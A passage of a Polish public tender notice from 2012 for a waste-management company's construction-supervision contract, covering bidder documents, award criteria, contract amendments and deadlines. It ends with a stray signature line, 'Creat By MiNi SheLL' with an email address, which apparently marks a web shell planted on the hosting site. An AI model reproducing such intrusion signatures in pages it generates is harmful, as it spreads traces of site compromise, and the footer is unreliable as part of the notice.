<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek sytuacji ekonomicznej i finansowej jest spełniony, jeżeli Wykonawca złoży wraz z ofertą Oświadczenie w zakresie art.22 ust.1 ustawy Pzp - (Załącznik nr 2 do SIWZ). Zamawiający nie precyzuje konkretnych warunków udziału w postępowaniu dotyczących sytuacji ekonomicznej i finansowej</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Zgodnie z art. 26 ust.2b ustawy Pzp, wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.

                   W przypadku złożenia wraz z ofertą  przez Wykonawców w-w zobowiązania, Zamawiający powołując się na przepis art.26. ust 2b ustawy Pzp, przepisy art. 78 § 1 Kodeksu Cywilnego, oraz orzecznictwo KIO, stwierdza iż wymaganie  formy pisemnej zobowiązania zostanie spełnione jedynie poprzez złożenie oryginału dokumentu zawierającego własnoręczny podpis osoby pod treścią oświadczenia - zobowiązania podmiotu trzeciego do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
2. Zgodnie z art.44 ustawy Prawo zamówień publicznych , wykonawca składa wraz z ofertą oświadczenie
    o spełnieniu warunków udziału w postępowaniu (Załącznik nr 2 do SIWZ), a jeżeli zamawiający żąda
    dokumentów  potwierdzających spełnianie tych warunków, również te dokumenty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>§ 10.
ZMIANY W UMOWIE
1.   Wszelkie zmiany, jakie strony chciałyby wprowadzić do ustaleń wynikających z niniejszej umowy, wymagają formy pisemnej  i zgody obu stron pod rygorem nieważności takich zmian.
2.  Możliwa jest zmiana umowy dotycząca :
1) terminu realizacji przedmiotu zamówienia w uzgodnieniu z Wykonawcą w następujących przypadkach:
a) w przypadkach określonych w pkt.2)
b)	wstrzymania robót przez właściwy organ z przyczyn nie zawinionych przez Wykonawcę robót budowlanych,
               np. dokonanie odkrywki archeologicznej, odkrycie niewybuchu, itp.
         c)   wystąpienia siły wyższej np. trąby powietrznej, pożaru, powodzi, uniemożliwiające prowadzenie robót
               budowlanych w nadzorowanej inwestycji
         d)  wystąpienia niekorzystnych warunków atmosferycznych, potwierdzonych przez IMiGW, uniemożliwiających 
               dochowanie wymogów technicznych i technologicznych przy prowadzonych robotach budowlanych tj. : 
  - temperatury otoczenia poniżej - 10 ° C utrzymującej się przez minimum 3 dni,
  - ciągłych opadów, trwających minimum 3 dni ,przekraczających średnie opady na danym terenie .
e)  wystąpienia osuwisk gruntu nie ustalonych w oparciu o dokonane badania geologiczne lub występujące ponad
     normy, dotyczy również wystąpienia innych, nie dających się przewidzieć zjawisk geologicznych i 
     hydrologicznych pojawiających się w trakcie budowy,
f)  zmiany  terminu wykonania robót  przez wykonawcę robót budowlanych,
g) przejściowego braku środków na sfinansowanie robót budowlanych do czasu ich uzyskania, 
h) strona powołująca się na okoliczności powodujące przedłużenie terminu winna powiadomić drugą
                stronę, na piśmie, w terminie do 3 dni od dnia ustania tych przyczyn pod rygorem utraty powoływania się
                na te okoliczności,
i)	zmiana terminu realizacji przedmiotu zamówienia będzie proporcjonalna  do okresu trwania w-w przypadków. 


2)	zakresu i sposobu wykonania przedmiotu zamówienia w przypadku:
a)	zaistnienia istotnych okoliczności powodujących, że wykonanie umowy w zakresie przewidzianym w dokumentacji  projektowej nie jest możliwe, czego nie można było przewidzieć w chwili zawarcia umowy;
b)	zmiany przepisów powodujących konieczność przyjęcia innych rozwiązań technicznych  poszczególnych elementów obiektu niż przewidzianych w dokumentacji projektowej;
c)	zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie części przedmiotu umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy,
d)	zmian  w dokumentacji projektowej, oraz  w ilościach i rodzajach robót z zachowaniem jednak zasady nie wykraczania poza określenie przedmiotu zamówienia zawarte w specyfikacji istotnych warunków zamówienia. Osobą upoważnioną i obowiązaną do dokonania kwalifikacji planowanego odstąpienia od zatwierdzonego projektu budowlanego i wykonawczego jest projektant. Zmiana taka musi być zaakceptowana przez Zamawiającego
        3)   Innych postanowień umowy w przypadkach:
    	a) ustawowej zmiany stawek podatku od towarów i usług - zmiana wynagrodzenia ryczałtowego. 
W przypadku ustawowej zmiany  stawki podatku VAT  - kwota wynagrodzenia netto pozostanie niezmienna,  a zmiana dotyczyć będzie  naliczonej stawki podatku VAT i w konsekwencji kwoty wynagrodzenia brutto. Zmiana dotyczyć będzie wyłącznie  niezafakturowanych robót.
b) zmiany nazwy zadania,
             c) zmiany inspektora nadzoru w poszczególnych branżach oraz technologa - warunkiem niezbędnym do
                 dokonania tej zmiany jest posiadanie uprawnień i doświadczenia przez  nowe osoby wskazane przez
                 Wykonawcę na poziomie nie mniejszym niż określony w SIWZ  Rozdział V ust.2 pkt 2.

       4) Warunkiem dokonania zmian  określonych w ust.2 pkt.1 jest wpływ ich przyczyn, na dochowanie terminu
           wykonania robót budowlanych w nadzorowanej inwestycji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pgo.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Gospodarowania Odpadami Sp. z o.o.

Paszczyna 62 b  , 39-207 Brzeźnica - Sekretarz Komisji Przetargowej Pani Justyna Różak.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2012 godzina 13:00, miejsce: Przedsiębiorstwo Gospodarowania Odpadami Sp. z o.o.

Paszczyna 62 b  , 39-207 Brzeźnica -Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane ze środków Unii Europejskiej - Fundusz Spójności - Program Operacyjny Infrastruktura 
i Środowisko , Oś Priorytetowa II : Gospodarka odpadami i ochrona powierzchni ziemi , Działanie 2.1 - Kompleksowe przedsięwzięcia z zakresu gospodarki odpadami komunalnymi ze szczególnym uwzględnieniem odpadów niebezpiecznych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com